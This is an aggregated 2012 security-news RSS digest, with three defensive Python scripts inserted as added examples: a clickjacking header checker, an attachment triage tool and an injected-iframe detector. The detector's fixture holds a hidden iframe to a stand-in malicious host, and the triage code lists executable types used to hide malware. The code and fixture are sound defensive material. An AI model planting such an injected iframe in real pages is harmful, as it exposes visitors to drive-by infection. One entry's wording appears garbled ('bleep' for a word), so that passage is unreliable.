http://www.infosecurity-magazine.com/rss/news/ News of a breach at Nationwide began to appear in November when it wrote to affected customers. Compromised information includes social security numbers, driving license numbers, date of birth and other information valuable to social engineering; but apparently no bank card or medical information.

==> Kim Dotcom wins another round in his battle against extradition

http://www.infosecurity-magazine.com/rss/news/ Kim Dotcom was arrested, and Megaupload seized just under a year ago. Since then Dotcom has been fighting extradition to the United States, while the New Zealand authorities have repeatedly bungled the case against him.

==> December 2012 Patch Tuesday preview

http://www.infosecurity-magazine.com/rss/news/ Next week's Patch Tuesday, the last of 2012, comprises seven security bulletins. Five are critical, two are important. Five require restarts, two may require a restart.

==> Cyber-spying, hacktivism and the public sector raise the threat level for 2013

http://www.infosecurity-magazine.com/rss/news/ As a companion guide to its retrospective of the security lowlights of 2012, Kaspersky Lab has taken its turn peering into the crystal ball to see what's ahead for 2013. The researchers also see the cloud, Mac malware, Android and exploits/vulnerabilities as trends to watch in 2013.

==> Malware set to take a big bite out of Apple in 2013

http://www.infosecurity-magazine.com/rss/news/ As Macs and other Apple devices move from the purview of the creative and CxO arenas into a more entrenched home in the enterprise, SophosLabs expects malware developers to reallocate their resources accordingly.

==> Eurograbber – banks must try harder

http://www.infosecurity-magazine.com/rss/news/ After news of the Eurograbber bank fraud malware campaign broke yesterday, the autopsy on what went wrong has begun. The general consensus is that the banks must do more to protect their customers.

==> WCIT: national governments’ control over the internet may be a side-effect

http://www.infosecurity-magazine.com/rss/news/ WCIT is now in process in Dubai. Its lack of transparency means that the world has had little but conjecture over its purpose and that conjecture has largely focused on a predicted grab for control of the internet on behalf of the UN.

==> Zeus malware throws €36+ million lightning bolt across Europe

http://www.infosecurity-magazine.com/rss/news/ A highly sophisticated, multi-pronged cybercriminal attack used to steal an estimated €36+ million from more than 30,000 bank accounts across Europe has been uncovered. The attack uses a new, souped-up form of the Zeus trojan.

==> 2012: The Year Malware Went Nuclear

http://www.infosecurity-magazine.com/rss/news/ Kaspersky Lab has broken down the top security stories of 2012, and the list is certainly filled full of doozies. The Mac OS X Flashback epidemic, cyber-espionage, the Android mobile malware explosion and Java zero-days are but a few of the greatest hits, or worst hits, as it were, of the year.

==> SMBs beware: Researchers uncover cloud browser vulnerability

http://www.infosecurity-magazine.com/rss/news/ Researchers from North Carolina State University and the University of Oregon have found a way to use a technique called MapReduce to exploit cloud-based web browsers, which execute JavaScript code for mobile clients.

==> Skills and security are the biggest barriers to successful business

http://www.infosecurity-magazine.com/rss/news/ The annual IBM Tech Report highlights four new technologies that are changing the face of IT: mobile technology, business analytics, cloud computing and social business, all of them suffering a severe skill shortage.

==> Little-understood bleep ID theft reaching crisis level

http://www.infosecurity-magazine.com/rss/news/ While identity theft is a well-known and well-feared issue, the mainstream concern tends to revolve around the theft of financial data, or the use of social security numbers and other sensitive information to set up bogus accounts, i.e., issues that grown-ups have. It turns out, however, that bleep are increasingly in the sights of criminals bent on perpetrating a range of fraud stemming from the creation of synthetic identities.

==> John McAfee turns up in Guatemala following manhunt

http://www.infosecurity-magazine.com/rss/news/ Security pioneer John McAfee, who started the powerhouse software company that still bears his name, is at the center of an international manhunt that is reminiscent of the Where's Waldo children's books. He has now fled to Guatemala.

==> Swiss intelligence agency loses terabytes of data to an insider

http://www.infosecurity-magazine.com/rss/news/ An IT technician working for the Swiss intelligence agency NDB simply downloaded and walked out with terabytes of data, the equivalent of thousands or even millions of printed pages.

==> O2 Ireland loses back-up tape with unknown, unencrypted data

http://www.infosecurity-magazine.com/rss/news/ O2 Ireland, part of the Spanish telecommunications company Telefónica Europe, has admitted the loss of a backup tape. The loss happened in September 2011; O2 learned about it in summer 2012 and is now telling its customers.

==> Dalai Lama website hack spreads new Mac malware

http://www.infosecurity-magazine.com/rss/news/ The security personnel in charge of one of the Dalai Lama's English-language websites are likely tapping their Zen reserves in the face of a new hack that is pushing a new form of Mac malware to unwitting visitors.

==> Minister describes progress on the UK Cyber Security Strategy

http://www.infosecurity-magazine.com/rss/news/ Francis Maude, UK Minister for the Cabinet Office and Paymaster General and the minister responsible for the cybersecurity strategy has delivered what is likely to be the first annual update on progress so far.

==> Mass phishing will be replaced by spear-phishing in 2013

http://www.infosecurity-magazine.com/rss/news/ The traditional mass phishing campaign of the past will slowly be replaced by more targeted and effective personalized spear-phishing in the future.

==> Sophos analyzes 2012, and predicts 2013 threats

http://www.infosecurity-magazine.com/rss/news/ The battle against the bad guys is continually evolving, with new attacks generating new defenses leading to new attacks. The Sophos 2013 Threat Report evaluates the experience of 2012 and predicts the evolution of threats for 2013.

==> Cyber trolls hack Tumblr

http://www.infosecurity-magazine.com/rss/news/ Cyber-troll group GNAA has claimed responsibility for compromising about 8,600 Tumblr accounts in a campaign that may be in response to the recent guilty verdict for Andrew Auernheimer in an iPad hacking case.

==> The final frontier: space-related threats blast off

http://www.infosecurity-magazine.com/rss/news/ Space is proving itself to be the final frontier not just in manned exploration, but also when it comes to security. According to security researchers, threats to various space agency equipment are advancing at warp speed.

==> Mobile, APTs and apps top IT security concerns for 2013

http://www.infosecurity-magazine.com/rss/news/ As they take stock of their endpoint vulnerability moving into 2013, IT departments are dealing with the flood of mobile devices entering their corporate networks, advanced persistent threats and third-party application vulnerabilities as their primary pain points, driving the need for new security approaches.

==> Phone users worry about security, but won’t pay for it

http://www.infosecurity-magazine.com/rss/news/ A survey of more than 1000 UK mobile phone users shows that while they are concerned about the security of their phones, they believe that they already pay enough; and they will hold providers liable for any loss of security.

==> Acer India hacked by Maxney; 15,000 user details leaked

http://www.infosecurity-magazine.com/rss/news/ It was announced on Sunday that the Acer India website has been hacked over the weekend, and a 41 Mb file was stolen and published on RapidShare.

==> Business disagrees with government on EU Data Protection Regulation

http://www.infosecurity-magazine.com/rss/news/ The first Ministry of Justice advisory panel discussion on the EU's Data Protection Regulation suggests a divergence between government and UK industry, with attendees feeling it should reduce the burden on business overall.

==> Connecticut university opens up 235,000 SSNs to hackers

http://www.infosecurity-magazine.com/rss/news/ Western Connecticut State University has disclosed a security breach that may have exposed names, addresses, financial information and Social Security Numbers of nearly 235,000 people over a three-year period.

==> EMV global payment standard will drastically reduce credit-card fraud in the US

http://www.infosecurity-magazine.com/rss/news/ With the Europay, MasterCard and Visa (EMV) global standard for credit and debit cards poised to be adopted in the US (there is an April 2013 migration deadline), analysts at Frost & Sullivan say that credit card payments will become much more secure. Almost half of the world's credit card fraud last year (46%) took place in the US, where the easily compromised magnetic stripe still rules the day.

==> Hacktivist group targets Syria in wake of internet blackout

http://www.infosecurity-magazine.com/rss/news/ Global hacktivist collective Anonymous is targeting Syrian websites worldwide to protest an internet blackout in that country, which was instituted Thursday in what most think is an attempt by President Bashar al-Assad to cut off communication routes for the opposition.

==> Clickjacking threatens two-thirds of top 20 banking sites

http://www.infosecurity-magazine.com/rss/news/ Almost two-thirds of the top banking sites, one-fifth of popular open-source web app sites and a full 70% of the top 10 websites by number of visitors have no countermeasures at all against clickjacking attacks, even where they require a secure environment, such as banks providing online banking services.
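The countermeasures the study counts are response headers, so the check is mechanical: does the page send X-Frame-Options and/or a Content-Security-Policy frame-ancestors directive that actually restricts who may frame it? The script below is an added example written for this entry, not code from the article or the study it reports; the header sets in SAMPLES are constructed, and the three-level rating is an assumed policy rather than a published scoring scheme.

```python
"""Rate a page's clickjacking defenses from its response headers.

Added example for this feed entry; it is not code from the article or the
study it reports. The header sets in SAMPLES are constructed, and the
three-level rating is an assumed policy, not a published scoring scheme.
"""
from __future__ import annotations

import html


def parse_frame_ancestors(csp: str) -> list[str] | None:
    """Return the source list of the CSP frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'\"").lower() for t in tokens[1:]]
    return None


def clickjacking_protection(headers: dict[str, str]) -> str:
    """Return 'strong', 'partial' or 'none'.

    Assumed policy for this example:
      strong  - CSP frame-ancestors that restricts framing ('none', 'self' or an
                explicit origin list). Browsers that support it honour CSP over
                X-Frame-Options, and it can express a multi-origin allow-list.
      partial - only X-Frame-Options DENY/SAMEORIGIN (or ALLOW-FROM, which is
                inconsistently supported), with no CSP directive.
      none    - neither header, or a frame-ancestors list that allows any origin.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    ancestors = parse_frame_ancestors(lower.get("content-security-policy", ""))
    if ancestors is not None:
        # 'frame-ancestors *' or a bare scheme such as https: permits any framer.
        if "*" in ancestors or any(a in ("http:", "https:") for a in ancestors):
            return "none"
        return "strong"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN") or xfo.startswith("ALLOW-FROM"):
        return "partial"
    return "none"


def framing_test_page(target_url: str) -> str:
    """HTML a tester serves from a different origin: if the target renders inside
    the frame, the browser confirms what the headers suggested."""
    safe = html.escape(target_url, quote=True)
    return (
        "<!doctype html><title>framing test</title>"
        "<p>If the page below renders, it can be framed.</p>"
        f'<iframe src="{safe}" width="800" height="600"></iframe>'
    )


# Constructed header sets standing in for the sites the study surveyed.
SAMPLES = {
    "bank-a": {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"},
    "bank-b": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://sso.bank-b.example",
        "X-Frame-Options": "SAMEORIGIN",
    },
    "bank-c": {"Content-Type": "text/html; charset=utf-8"},
    "portal": {"Content-Security-Policy": "frame-ancestors *"},
}


def audit(samples: dict[str, dict[str, str]] = SAMPLES) -> dict[str, str]:
    """Rate every sample; in practice the dicts come from an HTTP client's response headers."""
    return {name: clickjacking_protection(h) for name, h in samples.items()}


if __name__ == "__main__":
    for site, level in audit().items():
        print(f"{site}: {level}")
```

Run the header check against the authenticated pages (the ones with forms worth hijacking), not just the landing page: headers are often set per route. Where a site relies on JavaScript frame-busting alone, treat that as "none"; it can be defeated by sandboxed frames and onbeforeunload tricks, which is why the headers are the countermeasure that counts.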

==> Shylock malware evolves to evade security lab environments

http://www.infosecurity-magazine.com/rss/news/ Just as biological viruses constantly evolve to avoid being eradicated by the body's immune defenses, so too do cyberbugs. The Shylock malware has done just that, developing the ability to identify and avoid the remote desktop environments that researchers use to identify and analyze security threats.

==> Anti-virus vendors warn users to beware of the ChangeUp worm

http://www.infosecurity-magazine.com/rss/news/ ChangeUp is the Symantec name for the worm known as W32/VBNA-X by Sophos and W32/Autorun.worm.aaeb by McAfee. All three companies are warning their users about an increase in detections over the last few days.

==> BPI demands UK Pirate Party shut down its Pirate Bay proxy

http://www.infosecurity-magazine.com/rss/news/ The British Phonographic Industry (BPI) has written to the UK Pirate Party, a democratic political party, and demanded that it close the proxy service it provides to allow users to bypass the ISP block on The Pirate Bay.

==> ICO fines Tetrus owners £440,000

http://www.infosecurity-magazine.com/rss/news/ The UK Information Commissioner's Office has issued monetary penalties against Christopher Niebel (£300,000) and Gary McNeish (£140,000) for sending millions of unsolicited spam texts offering accident and PPI compensation services to mobile phone users.

==> Hewlett Packard’s Autonomy woes deepen

http://www.infosecurity-magazine.com/rss/news/ On Tuesday a new shareholder lawsuit claimed audit firms Deloitte and KPMG missed red flags about Autonomy's accounting, and also named HP's board of directors, officers, and former executives, alleging breach of duty and negligence.

==> Report tests browser ability to filter malicious URLs

http://www.infosecurity-magazine.com/rss/news/ NSS Labs has published the second of its two analyses on the security capabilities of the four leading browsers. The first report was on the ability of browsers to block malware; this second is on browsers' ability to filter malicious URLs.

==> Amelia Andersdotter describes the gulf between industry, government and people

http://www.infosecurity-magazine.com/rss/news/ ENISA, the European Network and Information Security Agency, held a high-level event at the Bedford hotel in Brussels on Tuesday. The subject was EU Cyber Cooperation, and the intent was to discuss shared responsibility.

==> FBI explores $150,000 payroll hack at Wisconsin school

http://www.infosecurity-magazine.com/rss/news/ Imagine: it's the day after Thanksgiving, and while most people are contemplating what bread to use with their turkey sandwiches for lunch, others are contemplating the best way to rip off a large sum of money from the unsuspecting.

==> Crystal ball time: Top 2013 risks include cyber war, cloud and BYOD

http://www.infosecurity-magazine.com/rss/news/ As the year draws inexorably to a close, it's only fair and natural that we, as an industry, peer into the future to see what could await us in the New Year. The latest to tackle such prognostication is the Information Security Forum (ISF), which has ID'd the top five security threats businesses will face in 2013.

==> UK, European politicians pledge support to online child sexual abuse hotline

http://www.infosecurity-magazine.com/rss/news/ More than 50 politicians from England, Wales, Scotland, Northern Ireland and continental Europe have signed up to fight online child sexual abuse with the Internet Watch Foundation.

==> 91% of APT attacks start with a spear-phishing email...

http://www.infosecurity-magazine.com/rss/news/ ...and 94% of the emails carry a malicious attachment usually in ZIP, XLS or RTF format. These are the findings of new research published today.
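If nine in ten targeted intrusions begin with a mail carrying a ZIP, XLS or RTF, the mail gateway is where a defender gets the first look. The triage script below is an added example written for this entry, not code from the research or the article: it parses a MIME message, flags attachments of those three formats, opens ZIPs to look for executables (by extension or by the MZ header, so a renamed binary is still caught) and catches the double-extension trick. The extension lists, the verdict thresholds and the sample message assembled by build_sample() are constructed for illustration.

```python
"""Triage e-mail attachments of the kinds the cited research ties to spear-phishing.

Added example for this feed entry; it is not code from the research or the
article. The extension lists, the verdict thresholds and the sample message
built by build_sample() are constructed for illustration.
"""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

RISKY_EXT = {".zip", ".xls", ".rtf"}   # the formats named in the article
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs", ".dll"}


def ext_of(name: str) -> str:
    """Lower-cased final extension including the dot, or '' if there is none."""
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def inspect_zip(payload: bytes) -> list[str]:
    """Reasons found inside a ZIP: an executable extension or a PE (MZ) header."""
    buf = io.BytesIO(payload)
    if not zipfile.is_zipfile(buf):
        return ["zip attachment is not a valid archive"]
    reasons = []
    with zipfile.ZipFile(buf) as zf:
        for member in zf.namelist():
            head = zf.read(member)[:2]
            if ext_of(member) in EXEC_EXT or head == b"MZ":
                reasons.append(f"zip member {member} is an executable")
    return reasons


def triage_attachments(raw: bytes) -> list[dict]:
    """One finding per attachment: its file name and the reasons it is suspicious."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = ext_of(name)
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ext in RISKY_EXT:
            reasons.append(f"{ext} attachment")
        if ext == ".zip":
            reasons.extend(inspect_zip(payload))
        pieces = name.lower().split(".")
        if len(pieces) > 2 and "." + pieces[-1] in EXEC_EXT:
            reasons.append("double extension hides an executable")   # e.g. invoice.pdf.exe
        findings.append({"name": name, "reasons": reasons})
    return findings


def verdict(findings: list[dict]) -> str:
    """'quarantine' if any attachment carries or hides an executable, 'review' if it is
    merely one of the risky formats, otherwise 'pass'."""
    reasons = [r for f in findings for r in f["reasons"]]
    if any("executable" in r for r in reasons):
        return "quarantine"
    return "review" if reasons else "pass"


def build_sample() -> bytes:
    """Constructed message: a ZIP wrapping a file with a fake PE header, plus an RTF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.pdf.exe", b"MZ" + b"\x00" * 62)   # header bytes only, not a real PE
    msg = EmailMessage()
    msg["From"] = "accounts@supplier.example"
    msg["To"] = "cfo@victim.example"
    msg["Subject"] = "Re: Q4 invoice"
    msg.set_content("Please see the attached invoice and notes.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="invoice.zip")
    msg.add_attachment(b"{\\rtf1 notes}", maintype="application", subtype="rtf", filename="notes.rtf")
    return msg.as_bytes()


if __name__ == "__main__":
    found = triage_attachments(build_sample())
    for f in found:
        print(f["name"], f["reasons"])
    print("verdict:", verdict(found))
```

In production, feed the function the raw message bytes from the gateway and route on the verdict; extend inspect_zip with a size cap and an encrypted-archive check (password-protected ZIPs defeat content inspection and are a common evasion), and remember that an XLS or RTF carrying an exploit needs no executable inside it, which is why the bare format counts as a reason on its own.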

==> AV ‘provides insufficient protection’ claims new report

http://www.infosecurity-magazine.com/rss/news/ The rate of detection for new viruses, claims a new report that tested 80 of them and is about to be published, is zero.

==> LulzSec hacker Hammond faces 30 years

http://www.infosecurity-magazine.com/rss/news/ At a bail hearing last week, Chief U.S. District Judge Loretta Preska denied bail and warned LulzSec's Hammond that he faces a custodial sentence of 30 years.

==> Critical infrastructure at risk from SCADA vulnerabilities

http://www.infosecurity-magazine.com/rss/news/ SCADA software, used for industrial control in utilities, airports, nuclear facilities, manufacturing plants and the like, is increasingly a target for hackers looking to exploit what appear to be growing numbers of vulnerabilities, giving rise to fears that critical infrastructure may be at risk.

==> Yahoo! mail exploit on sale for $700

http://www.infosecurity-magazine.com/rss/news/ A new zero-day vulnerability in Yahoo! Mail has given rise to a $700 exploit for sale in the hacking underground.

==> UN nuclear agency compromised by anti-Israel hacktivists

http://www.infosecurity-magazine.com/rss/news/ Another Middle East-focused cyber-attack has been launched, but it's a piece of news that would not be out of place in the Cold War era: the International Atomic Energy Agency has been hacked. Information from an out-of-use server has been stolen and posted online.

==> The salami apocalypse – big data in the wrong hands

http://www.infosecurity-magazine.com/rss/news/ The world is not facing a Mayan calendar doomsday next month so much as a salami apocalypse next year: threats built layer upon layer from small bits of information that can be combined into detailed personal profiles.

==> Privacy advocates ask Facebook to withdraw proposed policy changes

http://www.infosecurity-magazine.com/rss/news/ A letter signed by Marc Rotenberg, president at the Electronic Privacy Information Center, and Jeffrey Chester, president at the Center for Digital Democracy, has asked Mark Zuckerberg to withdraw the newly announced changes to Facebook's Data Use Policy.

==> Europol and ICE seize 132 domain names on Cyber Monday

http://www.infosecurity-magazine.com/rss/news/ The US Operation In Our Sights temporarily morphed into Project Cyber Monday 3 with a European Project Transatlantic offshoot and netted a combined haul of 132 seized counterfeiting website domains.

==> High-end Citadel financial malware overtakes Zeus as king

http://www.infosecurity-magazine.com/rss/news/ Citadel, which researchers say is essentially the Lamborghini of the financial information-stealing malware scene, is well on its way to overtaking Zeus and SpyEye as the go-to banking trojan after only being discovered earlier this month.

==> Go Daddy DNS hack spreads ransomware

http://www.infosecurity-magazine.com/rss/news/ Go Daddy, the world's largest internet domain host and registrar, may soon be known for more than those racy Super Bowl ads featuring Danica Patrick: ransomware is being spread across its footprint.

==> Spam volume hits year-long low, but remains just as dangerous

http://www.infosecurity-magazine.com/rss/news/ Global spam and phishing attacks decreased notably in October, reaching the year's lowest level of volume despite a rich mine of topics to leverage, like the presidential election in the US, Halloween and the advancing holiday shopping season. Also, a new hotel booking scam started making the rounds.

==> Round-up of Cyber Monday safe shopping tips

http://www.infosecurity-magazine.com/rss/news/ Cyber Monday is the first Monday following US Thanksgiving. It is a successful, marketing-manufactured online shopping bonanza, one of the biggest e-commerce days of the year and effectively the start of online Christmas shopping.

==> Targeted malware attacks SQL databases

http://www.infosecurity-magazine.com/rss/news/ W32.Narilam, primarily active in Iran, seems designed to attack the business databases of corporations, especially those related to ordering, accounting and customer relations. It doesn't steal data, it destroys data.

==> European Parliament passes a resolution condemning any internet takeover by the ITU

http://www.infosecurity-magazine.com/rss/news/ It is widely believed that next month's ITU conference in Dubai (WCIT-12) will include an attempt by the International Telecommunication Union, an agency of the United Nations, to assume effective control of the internet.

==> Facebook changes its Data Use Policy and scraps user voting

http://www.infosecurity-magazine.com/rss/news/ In an email apparently being sent to its billion users, Facebook has detailed changes to its data usage policy together with an amendment to its future governance process, causing many users to think they were being spammed or phished.

==> OFCOM suggests ISPs must decide who is a subscriber in relation to 3-strikes

http://www.infosecurity-magazine.com/rss/news/ Just as the US voluntary six-strike infringement code is about to begin, the UK's statutory three-strike regime inches closer with an OFCOM study into piracy and guidance on what constitutes a subscriber.

==> UN accused of planning to grab control of the internet in December

http://www.infosecurity-magazine.com/rss/news/ In just over a week's time (3 December) the World Conference on International Telecommunications (WCIT-12) will begin in Dubai; and it stands accused of planning a clandestine UN takeover of the internet.

==> Greek man arrested over theft of 9 million personal data details

http://www.infosecurity-magazine.com/rss/news/ While European eyes are focused on the increasing political unrest in Greece, it has taken US reporters to notice a small detail: a Greek man has been arrested on suspicion of stealing 9 million personal data files.

==> Half of UK internet users have no idea whether accessed content, software is legal

http://www.infosecurity-magazine.com/rss/news/ Just around half of internet users in the UK (48%) have no clue whether the online content they're accessing is illegal or not, a study has revealed. A full quarter (26%) said they would be more diligent about avoiding piracy if it were clearer what is legal and what isn't.

==> US Flames France – allegedly

http://www.infosecurity-magazine.com/rss/news/ French news site L'Express has accused the US of standing behind the infection of computers in the Élysée Palace with Flame-like malware during the last days of Sarkozy's presidency in May 2012.

==> ISF finds post-incident review sorely lacking in IT security departments

http://www.infosecurity-magazine.com/rss/news/ As IT departments continue to struggle with security effort prioritization, the Information Security Forum has launched the You Could Be Next report, which helps organizations to include post-incident review across three stages: impact assessment, root cause analysis and recommendations.

==> (ISC)² looks to address security expertise gap with 2013 scholarships

http://www.infosecurity-magazine.com/rss/news/ It's no secret that with the ever-rising tide of cyber threats there comes a need for additional security expertise to adequately combat the scope of attacks. Many IT departments suffer from a human capital resource issue, and it's not always funding-related.

==> Andrew Auernheimer (aka weev) guilty of identity fraud and conspiracy to access a computer

http://www.infosecurity-magazine.com/rss/news/ A Newark, New Jersey, jury yesterday took just a couple of hours to return a guilty verdict on two counts against grey hat hacker Andrew Auernheimer for his action against AT&T and early adopters of the Apple iPad in 2010.

==> New Linux rootkit delivering drive-by infections discovered

http://www.infosecurity-magazine.com/rss/news/ Eight days ago an anonymous victim posted details of a new Linux rootkit to the Full Disclosure mailing list, asking for information. The rootkit was adding an iframe into the HTTP responses returned by the victim's web server.
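The telling property of this rootkit is that it rewrote responses on the way out, so the HTML on disk stayed clean while every client received an extra iframe. That gives a simple check: fetch the page as a client would and diff the iframes against the file the web server thinks it is serving. The script below is an added example written for this entry, not code from the Full Disclosure post or the article; both documents it compares are constructed, and the injected URL uses the reserved .invalid TLD.

```python
"""Find iframes present in what a web server sends but absent from the file on disk.

Added example for this feed entry; not code from the Full Disclosure post or
the article. The rootkit described there rewrote responses in flight, so the
file on disk stays clean while clients receive an extra <iframe>. Both
documents below are constructed; the injected URL uses the reserved .invalid TLD.
"""
from collections import Counter
from html.parser import HTMLParser


class IframeCollector(HTMLParser):
    """Collect (src, hidden) for every <iframe>; hidden means 0/1 px or CSS-invisible."""

    def __init__(self) -> None:
        super().__init__()
        self.frames: list[tuple[str, bool]] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (
            a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style
        )
        self.frames.append((a.get("src", ""), hidden))


def iframes_in(html: str) -> list[tuple[str, bool]]:
    p = IframeCollector()
    p.feed(html)
    p.close()
    return p.frames


def injected_iframes(on_disk: str, served: str) -> list[tuple[str, bool]]:
    """Iframes in the served body that the on-disk file does not account for.

    A Counter lets a legitimate frame that appears once on disk cancel exactly
    one served copy, so a duplicated copy of it would still be reported.
    """
    budget = Counter(iframes_in(on_disk))
    extra = []
    for frame in iframes_in(served):
        if budget[frame] > 0:
            budget[frame] -= 1
        else:
            extra.append(frame)
    return extra


# Constructed documents: the on-disk page embeds one legitimate video frame; the
# served copy is the same page plus a 1x1 hidden frame slipped in before </body>,
# which is the shape of what the rootkit produced.
ON_DISK = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
</body></html>"""

SERVED = ON_DISK.replace(
    "</body>",
    '<iframe src="http://example.invalid/in.php" width="1" height="1" style="display: none"></iframe>\n</body>',
)

if __name__ == "__main__":
    for src, hidden in injected_iframes(ON_DISK, SERVED):
        print(f"injected iframe: {src} (hidden={hidden})")
```

Take the served copy from a separate machine with a browser-like User-Agent and Referer, since injection of this kind is often conditional on the client, and read the on-disk file over an out-of-band channel (mounted image, rescue boot) rather than through the compromised host's own kernel, which is the component doing the rewriting.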

==> Firefox 17 comes with security fixes and improvements – and social enhancement

http://www.infosecurity-magazine.com/rss/news/ Firefox 17 FINAL (the latest stable version) has been released with thousands of bug fixes, 16 security fixes, Facebook integration and a click-to-play plug-in blocklist security feature; Mozilla also drops support for OS X Leopard (10.5).

==> Quantum cryptography for all takes a giant leap closer

http://www.infosecurity-magazine.com/rss/news/ Toshiba Research Europe, working with the Cambridge University Engineering Lab, has today announced a breakthrough in quantum cryptography; bringing the potential for secure communications for everyone closer to reality.

==> Problems with the EU’s proposed ‘right to be forgotten’

http://www.infosecurity-magazine.com/rss/news/ The EU's proposed Data Protection Regulation includes a difficult concept known as the right to be forgotten. It proposes that individuals should be able to remove personal data that they no longer wish to be public, but it is fraught with difficulties. ENISA has produced a report on these difficulties.

==> INSIDE Secure buys Apple’s left-overs

http://www.infosecurity-magazine.com/rss/news/ In July Apple announced its intention to acquire security firm AuthenTec. This deal was completed on 4 October. Yesterday, French security firm INSIDE Secure announced its intention to acquire ESS. ESS is owned by AuthenTec.

==> IRISSCERT Warns Irish Businesses Under Increasing Threat of Cybercrime

http://www.infosecurity-magazine.com/rss/news/ IRISSCERT is to hold its fourth annual cybercrime conference this coming Thursday, 22 November. As part of the conference IRISSCERT will reveal its second annual cybercrime statistics report. Based on the security incidents reported to it so far in 2012, IRISSCERT will highlight key trends and issues that businesses in Ireland should be aware of.

==> Blackhole exploits a major problem in October

http://www.infosecurity-magazine.com/rss/news/ GFI Software's monthly malware analysis highlights the Blackhole exploit kit as a major problem during October, with specific campaigns linked to Windows 8, Facebook verifications, and Skype.

==> The legal implications of botnet disruptions

http://www.infosecurity-magazine.com/rss/news/ The best defense against a botnet is to get rid of it: to infiltrate it, to learn all about it, and to take it down. While the takedown is usually done by or with law enforcement, with any necessary court orders, the initial infiltration, often by individual security researchers or anti-malware vendors, remains a legally grey area.

==> FreeBSD shuts down servers after breach

http://www.infosecurity-magazine.com/rss/news/ Two servers belonging to the FreeBSD project were shut down at the beginning of last week following discovery of an SSH breach. The base operating system, maintained on separate servers, was not affected.

==> Top federal security execs join (ISC)²'s Government Advisory Board

http://www.infosecurity-magazine.com/rss/news/ Members of the Securities & Exchange Commission (SEC), the US Department of Health and Human Services and the US Department of Homeland Security (DHS) have joined the (ISC)² US Government Advisory Board for Cyber Security.

==> Hacktivist group Anonymous rallies to Gaza's side with #OpIsrael offensive

http://www.infosecurity-magazine.com/rss/news/ Hacktivist collective Anonymous has a new target: Israeli websites. The group has launched the #OpIsrael offensive via Twitter in response to Israel's military dispute with Gaza this week.

==> Proof-of-concept malware takes over USB smartcards

http://www.infosecurity-magazine.com/rss/news/ As if malware weren't pervasive enough already, a new proof-of-concept has been developed by a team of researchers that takes over smart cards plugged into an infected computer's USB port, putting them and all of the information contained on them in the hands of potential cybercriminals.

==> EDPS delivers Opinion on the EC’s ‘cloud’ communication

http://www.infosecurity-magazine.com/rss/news/ In September, the European Commission issued its Unleashing the Potential of Cloud Computing in Europe Communication. Today, on his own initiative, the European Data Protection Supervisor (EDPS) has published his Opinion on the privacy implications.

==> ENISA and the privacy considerations of online behavioral tracking

http://www.infosecurity-magazine.com/rss/news/ With advertisers still claiming that 'do not track' will destroy the free internet, and the European Commission proposing privacy-by-design and by default enforced by sanctions, ENISA has published a technical perspective on behavioral tracking.

==> Opera users urged to check for malware

http://www.infosecurity-magazine.com/rss/news/ Browsers come ready-configured with their own start-up home page; but the default Opera home page (portal.opera.com) was compromised with an obfuscated redirect leading to the Blackhole exploit kit.

==> Hacking-as-a-service offers access to Fortune 500 servers for a few bucks

http://www.infosecurity-magazine.com/rss/news/ Call it a hacking-as-a-service (HaaS): a group renting network server access for a variety of Fortune 500 companies, including Cisco Systems, is taking advantage of weak passwords to offer logins for cheap. Despite its discovery three weeks ago, the service still appears to be going strong, at last count renting access to nearly 17,000 computers worldwide.

==> A Closer Look at Two Bigtime Botmasters

http://www.krebsonsecurity.com/feed/ Over the past 18 months, I've published a series of posts that provide clues about the possible real-life identities of the men responsible for building some of the largest and most disruptive spam botnets on the planet. I've since done a bit more digging into the backgrounds of the individuals thought to be responsible for the Rustock and Waledac spam botnets, which has produced some additional fascinating and corroborating details about these two characters.

==> Espionage Attacks Against Ruskies?

http://www.krebsonsecurity.com/feed/ Hardly a week goes by without news of a cyber espionage attack emanating from China that is focused on extracting sensitive data from corporations and research centers in the United States. But analysis of a recent malware campaign suggests that cyberspies in that region may be just as interested in siphoning secrets from Russian targets.

==> ATM Thieves Swap Security Camera for Keyboard

http://www.krebsonsecurity.com/feed/ This blog has featured stories about a vast array of impressive, high-tech devices used to steal money from automated teller machines (ATMs). But every so often thieves think up an innovation that makes all of the current ATM skimmers look like child's play. Case in point: Authorities in Brazil have arrested a man who allegedly stole more than USD $41,000 from an ATM after swapping its security camera with a portable keyboard that let him hack the cash machine.

==> Vrublevsky Sues Kaspersky

http://www.krebsonsecurity.com/feed/ The co-founder and owner of ChronoPay, one of Russia's largest e-payment providers, is suing Russian security firm Kaspersky Lab, alleging that the latter published defamatory blog posts about him in connection with his ongoing cybercrime trial.

==> Online Service Offers Bank Robbers for Hire

http://www.krebsonsecurity.com/feed/ An online service boldly advertised in the cyber underground lets miscreants hire accomplices in several major U.S. cities to help empty bank accounts, steal tax refunds and intercept fraudulent purchases of high-dollar merchandise.

==> All Banks Should Display A Warning Like This

http://www.krebsonsecurity.com/feed/ One of my Twitter account followers whose tweets I also follow -- @spacerog -- shared with me the following image, which he recently snapped with his phone while waiting in line at the Philadelphia Federal Credit Union. It's an excellent public awareness campaign, and one that I'd like to see replicated at bank branches throughout the country.

==> Java Zero-Day Exploit on Sale for ‘Five Digits’

